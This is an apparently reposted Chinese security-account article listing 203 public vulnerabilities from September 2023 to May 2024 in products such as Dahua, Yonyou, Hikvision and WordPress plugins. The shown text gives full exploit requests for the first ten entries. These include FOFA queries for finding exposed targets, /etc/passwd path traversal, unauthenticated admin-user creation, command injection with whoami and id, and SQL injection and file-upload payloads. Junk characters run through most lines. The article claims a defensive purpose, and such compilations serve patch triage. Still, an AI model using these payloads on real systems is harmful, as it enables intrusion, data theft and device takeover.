互联网公开漏洞整理202309-202406% z# F4 I b7 ?; E! Q" W0 C
道一安全 2024-06-05 07:41 北京" F) y @# k8 h3 I5 I
以下文章来源于网络安全新视界 ,作者网络安全新视界' L& Z4 n% N j. O( v1 x
7 F$ x2 Z) ^# V3 }
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。6 k- M+ U5 _( e. ?" V/ w! u
1 j# ]* a) S/ F4 V* B- Y, U6 x漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
8 o3 x* d2 _: d) r; |* c; G" _8 g( V1 K P
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
+ h- V8 Y {% b m4 w$ a
) T6 Z$ D$ e; H' Z# N文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。# q0 c" b/ {% a7 C9 W4 I
( k/ R0 V% q& c* J# u2 Q6 h, o
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
0 U9 f) B/ w3 b0 t% z- N
6 s6 b: Z$ ^6 B C6 L7 Y* A
( k. A# w# m1 I* w" W1 U声明3 ^2 w c, ]! J
' {% }, L+ K( w/ o: ~为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。3 R- n9 a5 K/ |4 M- k5 }( q
! w$ `% t; t( q) W. C' _7 m有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。/ y" Y: |& N! z+ X' y& |% W" z
4 m: a' R# {+ w; k6 g3 S
/ E# s$ @8 t5 ]% R) J
1 H8 q2 Z( X" t) q7 r; j/ F* L目录5 u0 H, P8 l4 l/ s; E) o; G9 x( P
# b$ w. ~5 v5 a4 @) j01
- H7 t2 K% O1 Y9 v" D
1 B8 b- J8 [- I& K1. StarRocks MPP数据库未授权访问* W, k. h, b5 `1 h" T
2. Casdoor系统static任意文件读取& [) b( f8 d! A& a
3. EasyCVR智能边缘网关 userlist 信息泄漏
: B4 q* W0 P% `' D' Y! W5 M G4. EasyCVR视频管理平台存在任意用户添加
4 j$ X* W" p, u+ L$ `5. NUUO NVR 视频存储管理设备远程命令执行& a& k* E$ q/ e5 S' t) |4 [6 c2 y
6. 深信服 NGAF 任意文件读取
. h! r! _. J, A8 `0 A8 L; L0 y2 O7. 鸿运主动安全监控云平台任意文件下载
8 D& k' h* D6 c3 {5 f8. 斐讯 Phicomm 路由器RCE8 ?4 r8 B9 M# x8 S
9. 稻壳CMS keyword 未授权SQL注入# y5 W$ h9 m. a7 X, j+ e& |7 L
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传' ]! t" ~2 K, B) p: E
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入- M7 h- y* P$ E& [" E6 Z
12. Jorani < 1.0.2 远程命令执行
! R, F3 j2 ?0 k! A5 s Q0 L13. 红帆iOffice ioFileDown任意文件读取, V% E1 X. e) e' {0 `0 ]
14. 华夏ERP(jshERP)敏感信息泄露
% M& p- ^; t# t5 N) i3 E15. 华夏ERP getAllList信息泄露
9 w! h! \: s0 j5 s( F$ _16. 红帆HFOffice医微云SQL注入/ s# `0 O* ^- d- {2 o+ l
17. 大华 DSS itcBulletin SQL 注入! y% G5 e" a9 g' w& F. u+ }7 Z
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露$ j3 A g, G2 o! e: r# L
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入6 k( N4 v: P3 S* g) Z
20. 大华ICC智能物联综合管理平台任意文件读取2 D) Q! h8 l3 g0 ^
21. 大华ICC智能物联综合管理平台random远程代码执行. p. }4 `' k6 y# j
22. 大华ICC智能物联综合管理平台 log4j远程代码执行. r& l+ x% X; [! T. ~) g# P; R
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行5 i% \! g2 }- y: w( n8 e+ g6 {
24. 用友NC 6.5 accept.jsp任意文件上传* W: q% b* w1 Z4 X# R r
25. 用友NC registerServlet JNDI 远程代码执行
. {- e4 q! n5 E$ s4 L26. 用友NC linkVoucher SQL注入0 A3 g0 o, P- F2 L, d$ ?! H
27. 用友 NC showcontent SQL注入
! C0 [/ t* d3 n0 O3 w28. 用友NC grouptemplet 任意文件上传
( c! @* O& i: v( e& j% F6 g29. 用友NC down/bill SQL注入
( [' ?% b+ q# b' \/ F4 D30. 用友NC importPml SQL注入
: H* Y! {" z7 A& [31. 用友NC runStateServlet SQL注入
+ R" A% R' |! a) E8 v) f32. 用友NC complainbilldetail SQL注入. p* w: ]1 [7 _. d* J2 X7 J
33. 用友NC downTax/download SQL注入6 `- Z$ \' }( k$ Z3 V0 }
34. 用友NC warningDetailInfo接口SQL注入
6 j# ?/ K! {1 o: s: ]35. 用友NC-Cloud importhttpscer任意文件上传
4 Y1 G* z: q) @- {! Z, U36. 用友NC-Cloud soapFormat XXE0 c4 r$ G6 o& P: Y
37. 用友NC-Cloud IUpdateService XXE
7 T+ K6 k1 }8 i38. 用友U8 Cloud smartweb2.RPC.d XXE5 ?) k9 O+ `2 V- E
39. 用友U8 Cloud RegisterServlet SQL注入
3 g4 @! p6 I- c; t& T% H40. 用友U8-Cloud XChangeServlet XXE
. ~# m" Z: f! I6 v' [3 T41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
8 n7 n, M1 o9 u. e* k42. 用友GRP-U8 SmartUpload01 文件上传
8 N" H! b# ^4 R: V# X1 l' M6 L0 a& Y43. 用友GRP-U8 userInfoWeb SQL注入致RCE- U8 F3 W; b; h9 h- t
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
& S" R) E& {( W. X3 N7 m) h. ~45. 用友GRP-U8 ufgovbank XXE
% A B( t `! j/ j0 ^46. 用友GRP-U8 sqcxIndex.jsp SQL注入0 z0 Y% p3 b$ U. p) @* G4 G
47. 用友GRP A++Cloud 政府财务云 任意文件读取. N5 r8 q% x, R5 K5 o+ M
48. 用友U8 CRM swfupload 任意文件上传: ]4 [2 ] K: E& u6 k0 H
49. 用友U8 CRM系统uploadfile.php接口任意文件上传. ], f7 H9 T8 Q0 C+ |% K
50. QDocs Smart School 6.4.1 filterRecords SQL注入
3 k3 M2 z: W8 [- r9 O+ F& S51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入8 Z, M1 v0 Y5 h+ v+ r
52. 泛微E-Office json_common.php sql注入
; E9 M4 M5 v) A+ R8 |- R1 `. G53. 迪普 DPTech VPN Service 任意文件上传- S9 u4 x/ [* z% e
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
& g" Z4 Q) X- ~- r% G7 m4 F7 E+ R7 r55. 畅捷通T+ getdecallusers信息泄露
# U: O8 v1 A1 t' i% {56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE+ A& ]8 K* Y. T& v: L
57. 畅捷通T+ keyEdit.aspx SQL注入
$ T5 K8 H8 e" z, U58. 畅捷通T+ KeyInfoList.aspx sql注入, p7 C* @+ r: Q9 o* V# u
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
5 g% @1 W! }' o9 ?5 G0 P) S* _60. 百卓Smart管理平台 importexport.php SQL注入# ~* h; k6 n, q* {% l- {3 c: ?
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
" V* z5 A% `- H6 K' N% k62. IP-guard WebServer 远程命令执行
2 [! @* b) R" Z6 c. u" O63. IP-guard WebServer任意文件读取
( J& Z; e0 Y8 B, |- L( P; W8 K) {64. 捷诚管理信息系统CWSFinanceCommon SQL注入' C) y. [& c( U5 D: k- d8 _/ B
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
$ e2 `: x' B4 {. ]7 ?( o66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
& P# E% T+ l, _67. 万户ezOFFICE wpsservlet任意文件上传
. e0 j3 }( M) t- B) C2 Z' m2 y. G68. 万户ezOFFICE wf_printnum.jsp SQL注入/ ? }7 U Q3 P; y4 D6 @" n
69. 万户 ezOFFICE contract_gd.jsp SQL注入
( K* u+ g. _4 e0 k; T70. 万户ezEIP success 命令执行, s1 \$ w; H9 T" d) N, l
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入2 V3 \. H3 r0 G* [
72. 致远OA getAjaxDataServlet XXE
' o% N0 |3 u9 h' c! M1 _* J73. GeoServer wms远程代码执行, O# c: ~5 ?' `! }3 P( x
74. 致远M3-server 6_1sp1 反序列化RCE% }6 k$ U4 \" K4 D
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE' A$ S, a2 Q7 b Y5 ^8 e
76. 新开普掌上校园服务管理平台service.action远程命令执行) H" S7 }- d& M# Q& p$ k. w
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
9 i" h2 K: K7 R' ^& P9 i78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
0 y2 U$ m e2 w: ? Z- C0 U! H79. BYTEVALUE 百为流控路由器远程命令执行4 ]0 C; |3 s' S9 f" _
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传6 C7 q6 q! I s
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
. C& i5 j, g: O& S8 q82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
. j# ?* m5 K: k( y. M! D2 a83. JeecgBoot testConnection 远程命令执行
) G9 F" A0 t' o( R84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
. e% {$ Q5 z) A/ B4 c85. SysAid On-premise< 23.3.36远程代码执行
% |/ U* `# M2 t1 V& n' T2 I3 |5 E86. 日本tosei自助洗衣机RCE
[ A$ L: P- ^3 c2 ?, E1 ~5 s87. 安恒明御安全网关aaa_local_web_preview文件上传' g' w# ~, R: W
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
- g8 n8 ~2 K4 K* S! R! Q9 e: V/ R89. 致远互联FE协作办公平台editflow_manager存在sql注入 {9 a& A8 r. G* |! z( d
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
1 m/ {& ~4 }8 l- x& h6 [1 K91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取# _: ~; p* W% C1 c5 J/ K
92. 海康威视运行管理中心session命令执行
. d5 m8 P1 d# Y: ?( g- m93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
* b# x8 K4 l. l6 e+ z" e94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
; L) D; c& K% p* K9 J7 `* p2 d95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
1 A8 x X7 ^7 K9 d/ z: e# |9 H96. Apache OFBiz 18.12.11 groovy 远程代码执行9 l1 n8 v( l. H, ~; X# P
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
' ^9 D1 O$ L4 B3 f4 t1 k98. SpiderFlow爬虫平台远程命令执行
7 N9 b: g' d+ c! S0 I2 H. Z99. Ncast盈可视高清智能录播系统busiFacade RCE0 a8 i& ^# e5 p2 {) c
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传 C) y- U# U$ k0 Z6 k0 H
101. ivanti policy secure-22.6命令注入
$ K0 K# J- Q; P- O' r; n102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
' }2 G3 b: f9 U% D: d103. Ivanti Pulse Connect Secure VPN XXE
2 L& G7 V2 D, ~* ?3 j104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露9 q& B, C6 I" t$ H- E
105. SpringBlade v3.2.0 export-user SQL 注入
: L4 w: P7 J, z& x( P# V106. SpringBlade dict-biz/list SQL 注入
1 [" @) x: s0 V2 j9 X0 [$ Z107. SpringBlade tenant/list SQL 注入2 }) ?, J) U: M) a! m8 S' p! L
108. D-Tale 3.9.0 SSRF
* `& T7 n1 S; s* C C* ^6 J109. Jenkins CLI 任意文件读取
7 K, b3 S5 e ^110. Goanywhere MFT 未授权创建管理员2 C2 K: ~* H( o3 G' e) C+ [2 u
111. WordPress Plugin HTML5 Video Player SQL注入
; ~6 M0 e! @; a5 z6 @* x' u: \112. WordPress Plugin NotificationX SQL 注入7 F% t# h4 |6 ^5 U4 X, _! b6 n) k
113. WordPress Automatic 插件任意文件下载和SSRF
. F# S' R, l) }. l! a# }114. WordPress MasterStudy LMS插件 SQL注入
# K7 T" m7 J' E8 F% e115. WordPress Bricks Builder <= 1.9.6 RCE8 r- z; X& I0 e* _) T& ?# F
116. wordpress js-support-ticket文件上传3 ?: d2 Y$ q; D" [; S( P
117. WordPress LayerSlider插件SQL注入/ [, `/ g. s! r0 z5 s2 Z/ E
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传 G8 d/ Z3 z9 c% Q- r5 I" @
119. 北京百绰智能S20后台sysmanageajax.php sql注入" m7 D, p! {. H
120. 北京百绰智能S40管理平台导入web.php任意文件上传
2 I+ j) Q# x0 Q- p121. 北京百绰智能S42管理平台userattestation.php任意文件上传; x) ~3 U/ v+ C% R/ F
122. 北京百绰智能s200管理平台/importexport.php sql注入
9 y1 x0 J! P8 a% O/ N123. Atlassian Confluence 模板注入代码执行
$ r, V; E, Y9 d124. 湖南建研工程质量检测系统任意文件上传
$ C% I3 {& D' J125. ConnectWise ScreenConnect身份验证绕过
& L3 y" l4 C+ P3 b* J126. Aiohttp 路径遍历
6 @5 \0 F/ i. o( b127. 广联达Linkworks DataExchange.ashx XXE3 t: ]( d( {# E7 v
128. Adobe ColdFusion 反序列化- [% X( A4 ~0 V9 d4 `3 Y
129. Adobe ColdFusion 任意文件读取! {+ Y% w7 h% [) T3 I% i
130. Laykefu客服系统任意文件上传2 Q0 g( P( q' u) U. w* G# M/ P4 U
131. Mini-Tmall <=20231017 SQL注入
" T3 r$ _1 ?1 x& W132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过% I; v( K" E, y$ d+ S
133. H5 云商城 file.php 文件上传4 O! [5 @# y* r4 H
134. 网康NS-ASG应用安全网关index.php sql注入
8 e- J& H7 X: A% c135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
1 c, J3 _. }9 @, O0 P7 r136. NextChat cors SSRF; P Q; p% O# S/ C, y, M# x
137. 福建科立迅通信指挥调度平台down_file.php sql注入
# P# i; c( u7 q7 n, P" g138. 福建科立讯通信指挥调度平台pwd_update.php sql注入& e1 J8 M/ C: R: m+ k; q9 X, O) I# \
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
* F" Q4 g* ]% D* u1 e3 B7 t$ y140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
# C+ V0 P- u8 E141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入7 F5 f3 N" m4 A7 E; ?9 K y
142. CMSV6车辆监控平台系统中存在弱密码
" Y* k9 z! h( {" [: c143. Netis WF2780 v2.1.40144 远程命令执行
/ T* ~, p! D4 C- v8 y- d4 i144. D-Link nas_sharing.cgi 命令注入
1 a6 h' w+ C, N/ G8 w145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
8 T6 L9 B9 R/ m# Q; k: D" Z146. MajorDoMo thumb.php 未授权远程代码执行
8 k6 t( B0 ]6 V% }147. RaidenMAILD邮件服务器v.4.9.4-路径遍历: B' I" A# W: f5 |$ y5 V- w0 c/ g
148. CrushFTP 认证绕过模板注入1 Z7 e' m, C8 y" P& n! z/ r
149. AJ-Report开源数据大屏存在远程命令执行
' i4 {) C: r9 s3 i9 m$ l, D6 Y! s150. AJ-Report 1.4.0 认证绕过与远程代码执行/ H9 y- ~; T) J1 o( [
151. AJ-Report 1.4.1 pageList sql注入
. V3 ]9 u- F+ S; w G+ Y) P152. Progress Kemp LoadMaster 远程命令执行
% |4 K% ~; k1 i153. gradio任意文件读取
$ [7 L: ]: H7 L$ l! i154. 天维尔消防救援作战调度平台 SQL注入
3 x2 g& X8 O& Q. z; i155. 六零导航页 file.php 任意文件上传
% l# `: X" A/ x, o" y* B4 u156. TBK DVR-4104/DVR-4216 操作系统命令注入
/ ~$ S7 k' r/ w- U1 f157. 美特CRM upload.jsp 任意文件上传! ^( u6 v' Y' K$ U5 f0 |
158. Mura-CMS-processAsyncObject存在SQL注入# w6 U) Y8 n' |" k$ ~* ?
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
2 E9 l9 ?6 y8 T$ F+ D1 O0 \! N! C% b160. Sonatype Nexus Repository 3目录遍历与文件读取
9 {. ~& Z$ i% V6 l. q. A7 s& i: G2 b161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传2 w8 M! N! c& y" X
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传! T" a8 U# x! S4 G8 o3 y" M
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
1 |. P* }: B+ o D8 n164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传2 [7 X5 w$ |! A: }, i
165. OrangeHRM 3.3.3 SQL 注入
6 r ^2 L6 [$ L: ^2 D166. 中成科信票务管理平台SeatMapHandler SQL注入
+ @) L7 z) I) x/ E% ?167. 精益价值管理系统 DownLoad.aspx任意文件读取
% f! j; t$ g9 k9 P% w/ ?168. 宏景EHR OutputCode 任意文件读取0 T1 m" j. P# \
169. 宏景EHR downlawbase SQL注入
5 @1 S; f1 `1 g. _5 B, @- @170. 宏景EHR DisplayExcelCustomReport 任意文件读取) j- j/ n" E2 h/ F- q
171. 通天星CMSV6车载定位监控平台 SQL注入# a5 o8 J) p0 k2 s/ T* E7 G$ L
172. DT-高清车牌识别摄像机任意文件读取
( u9 G0 Z& @! {1 K' |1 l173. Check Point 安全网关任意文件读取0 A7 Q+ O! R C: s8 t. i4 v' C9 o
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
- z. ~& S7 h: w4 Z) W175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入5 x S# z2 L: }- k" ~, ^0 D
176. 电信网关配置管理系统 rewrite.php 文件上传: F2 W! N: W* C, _
177. H3C路由器敏感信息泄露
; [2 x! x7 U) _178. H3C校园网自助服务系统-flexfileupload-任意文件上传
4 C( b% g" y# K4 E179. 建文工程管理系统存在任意文件读取
- r4 u. S/ j0 y( f9 M e' n180. 帮管客 CRM jiliyu SQL注入- W ^( U( @' B) B' M% g# G0 t [; A
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
2 [) I5 u( z- W' A) s6 \& `% ?182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
/ Y r# ?, D+ j4 M0 M3 ]2 c183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入9 F4 N5 s6 x: b1 N5 A# Q
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加! U: O8 @8 B+ K0 j
185. 瑞友天翼应用虚拟化系统SQL注入
5 g7 w3 L8 n* M; A M5 g! Y186. F-logic DataCube3 SQL注入
* z3 e! ^' P& n( s. X3 C' ]187. Mura CMS processAsyncObject SQL注入; y( r% o8 z: X; E2 R
188. 叁体-佳会视频会议 attachment 任意文件读取( g1 _! s& h4 b8 I1 n- {
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
' H1 F. I( W/ \/ w190. 短视频矩阵营销系统 poihuoqu 任意文件读取
, q* V4 j& I6 q! r191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
$ L3 W, d6 {7 @" ?9 t192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
2 O Z6 V& R4 k5 K4 A) y% U193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
4 [0 S/ r' v( @. u8 z% T0 L194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
& I# t9 l) ` A( O8 V! k8 Z( p195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
; y* d- M4 l9 j) q196. 河南省风速科技统一认证平台密码重置
! Q7 c' z2 L7 N197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
" H) {. w+ v' I4 ]198. 阿里云盘 WebDAV 命令注入
6 {' x B# K( o. y% B! C/ E199. cockpit系统assetsmanager_upload接口 文件上传
( ?. g j P1 T. H P# I200. SeaCMS海洋影视管理系统dmku SQL注入
( A' Z9 O. {; C# @1 Q k' c& T6 p201. 方正全媒体新闻采编系统 binary SQL注入4 O% y. G8 ?7 l; x/ X* i
202. 微擎系统 AccountEdit任意文件上传
9 a" k$ a( f- G9 T V9 ]# v5 t203. 红海云EHR PtFjk 文件上传
4 o. P& Q7 M! p; t' O/ {# \- R y& e9 w$ x$ G0 J0 B8 U1 C X, s
POC列表9 K8 q2 y6 P5 L9 n5 S
, @: V/ u6 l) U0 |. x- k
023 x6 e/ e8 c5 x- z7 q
4 M' b, t( V3 y) W9 K$ c1. StarRocks MPP数据库未授权访问: p+ Z7 @0 ~% K8 i' t' g
FOFA :title="StarRocks"
) L1 x: b; ~9 lGET /mem_tracker HTTP/1.11 ^1 h6 S* x/ W& R, m6 q1 N) c
Host: URL
2 j% P% [' {) t9 c& L7 w) P
! ]8 a' P2 j3 g% y4 o: H/ o! T( r) P; p9 t
2. Casdoor系统static任意文件读取# s5 `. x, ]1 Q4 X
FOFA :title="Casdoor"# K7 y' k; o. o* V# Z( q. Z; u% s
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1( t8 n0 j" ^/ g9 G" p/ J
Host: xx.xx.xx.xx:99998 Z! ~. v( m, R1 _9 i1 A5 v5 u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 e9 X) n+ c4 N8 e. H& H
Connection: close
8 E- a7 u% A/ o0 T" H: UAccept: */*" n8 E% d) Z1 S7 o
Accept-Language: en
5 x. K) F. }* e. j7 oAccept-Encoding: gzip8 ]6 }: |9 N7 t4 c
( B9 A V) O6 g' m9 \' U. I) g
4 u/ `( B: `4 j7 P' j2 x; u+ W3. EasyCVR智能边缘网关 userlist 信息泄漏
3 K% j7 \5 _+ i! e& y& ~/ \; JFOFA :title="EasyCVR"1 c7 s- f$ L: r; w
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
. \ B) `- U2 b( ]. r" u4 r3 R s" pHost: xx.xx.xx.xx
9 u1 A* `/ B9 Z. ^9 a: |
* H: C2 B9 f1 h6 f: F, {/ p* [
; E$ R* c( A, A" ^1 Q4. EasyCVR视频管理平台存在任意用户添加3 Y. [# C! r' @0 U, h/ W. i, A6 t1 Y
FOFA :title="EasyCVR"! Y. _2 `% i2 P, S# e, [- N
/ z O2 S1 J) s* p: `/ v& E2 Zpassword更改为自己的密码md5+ x6 H; a9 g( C" _3 a$ U
POST /api/v1/adduser HTTP/1.1: l2 q2 ]2 ^, a0 M, z- `/ N5 G' s
Host: your-ip, ?1 @0 a" Q& v0 Z: V2 {9 U2 a
Content-Type: application/x-www-form-urlencoded; charset=UTF-8' L3 I9 R T: p
- y- i& ^" V8 U! t5 X
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
4 K) o; S& {0 v# w1 r
+ [$ N, w* F3 |" \' W8 A. X) e' g8 @* u+ L$ A& U. }
5. NUUO NVR 视频存储管理设备远程命令执行
) q/ P w& e% I+ d, ]- l: ]& xFOFA:title="Network Video Recorder Login"3 ]' a1 O! b' e! {
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
/ l, c' n# b7 D3 p; e0 `% `( XHost: xx.xx.xx.xx2 L$ L1 b% w: b5 q! H7 U
: Z# J3 I% q& P! e
# m3 r+ ~9 F- f* P/ V% P6. 深信服 NGAF 任意文件读取. A& e+ c0 G& H& d0 ?
FOFA:title="SANGFOR | NGAF"6 s& M* }( [! }4 k' ]) @& K
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
, t/ Q4 J9 y: G8 I: VHost:/ U5 w0 W( ^0 W
8 q: O0 T% e( f+ z0 k! H; l2 R
' M) V2 ^% ^7 {8 o7. 鸿运主动安全监控云平台任意文件下载
& w9 M: S& P# I0 V2 p0 m& JFOFA:body="./open/webApi.html"
1 | T( `( |2 S' ^0 `8 L6 h! `& hGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
+ S+ R# v; k* T1 N- O/ G7 _Host:
3 F$ P0 ?* D9 A& J4 o1 Z" _9 O
/ R$ I) M& [( T( p7 w. Q) S% z G* u
8. 斐讯 Phicomm 路由器RCE r0 d8 u7 x i2 T( j$ Q7 A3 @
FOFA:icon_hash="-1344736688"
9 g/ v; i: {8 T1 z' N默认账号admin登录后台后,执行操作& z8 l: |0 x$ S9 [! B$ k/ Z( R
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
k8 ]) z2 H& C; u% d9 DHost: x.x.x.x
# }7 t6 @$ ~; N6 ], UCookie: sysauth=第一步登录获取的cookie+ T5 `6 }7 f( N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz. l! U N) r+ i0 f/ s
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36' l' t/ s* L8 K
; M( Y6 i- ~3 x/ a. _
------WebKitFormBoundaryxbgjoytz/ Q/ m: O1 X4 r7 Z- h+ G2 ?0 ?
Content-Disposition: form-data; name="wifiRebootEnablestatus"
; Q8 @9 R3 g" z& b8 ?7 `+ [2 `' S
%s7 x1 g1 U* `3 s4 B6 B5 X
------WebKitFormBoundaryxbgjoytz) [+ a# {3 |% t2 f8 k
Content-Disposition: form-data; name="wifiRebootrange"
. y8 n" V6 B1 A( g# m; d% D
6 }3 R; N- j7 d12:00; id;. }# e+ X' v7 `! t, J
------WebKitFormBoundaryxbgjoytz3 O+ N* N" _/ j7 N" @
Content-Disposition: form-data; name="wifiRebootendrange"
: a- L/ u- e( O: u. i/ q0 J
# V0 w5 i: A( M0 f%s:/ A7 j6 ~! O6 f+ g0 T7 r1 Q8 L
------WebKitFormBoundaryxbgjoytz
: D; u b8 n4 A/ n) uContent-Disposition: form-data; name="cururl2"
# {0 J% B( K$ b! q7 N: k2 I u
4 L$ z9 ?' ^# v; R4 b' G7 w1 V
7 b* }1 i' {3 h. d------WebKitFormBoundaryxbgjoytz--% L, q5 ~3 t9 J: }* n {7 K
! r n8 U# Q% o! \9 o: u& l/ A1 O# l+ j
9. 稻壳CMS keyword 未授权SQL注入+ _; T) B5 B3 ?/ ?. H' M2 u
FOFA:app="Doccms"/ U! n0 _2 F* c1 w: K
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
; X) E( L9 R/ D% ~' W: ^Host: x.x.x.x8 k9 y2 k# c n$ t9 e N
7 W4 d5 v u5 l1 d" F. R' h
; Y" x$ A: t! V8 j3 A. }% b ipayload为下列语句的二次Url编码
' ^( \+ i) X. g4 u y
c" v0 n7 L8 t% t" e' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
" }+ J9 V8 r+ w! b! u
8 {( @$ B& l1 Q1 c5 Z0 N; j* k10. 蓝凌EIS智慧协同平台api.aspx任意文件上传4 ^3 q8 b# [/ X3 S( O% ~. R
FOFA:icon_hash="953405444"2 h6 i* `0 U$ {) s* D( r
% p2 g1 j& d2 [. B; v* t4 i文件上传后响应中包含上传文件的路径
J$ x/ C k( SPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
. e6 T) Q7 E) c7 UHost: x.x.x.x:xx
0 `* G- Z: J( w, `, IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
( ~1 D" ?$ T. TContent-Length: 197: B+ m, r( `4 ^( d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
8 ?1 z5 j* }, T gAccept-Encoding: gzip, deflate2 D; p% _; [; d
Accept-Language: zh-CN,zh;q=0.9$ d9 G. O. A; M' e' q4 s
Connection: close' N! W ?9 g' M7 q3 _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
6 E3 T) c0 d0 W; w) L* u
; S2 W5 U% |+ A& Z* i* t------WebKitFormBoundaryxdgaqmqu) N2 j- `1 E2 C Z$ ^8 u
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
% @( s# V- [$ @/ U8 C& d' \Content-Type: text/html
6 n- y+ r! Y0 [6 |4 U
9 L% Z2 T4 ^# l1 \jmnqjfdsupxgfidopeixbgsxbf
; \/ F2 S* d' B( e+ f1 o, x------WebKitFormBoundaryxdgaqmqu--" _! Z) o! ~8 P- `! G+ t1 c
, ]: ]0 B" x: f( z) W& ]
+ q. ~. I5 G, @- E
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
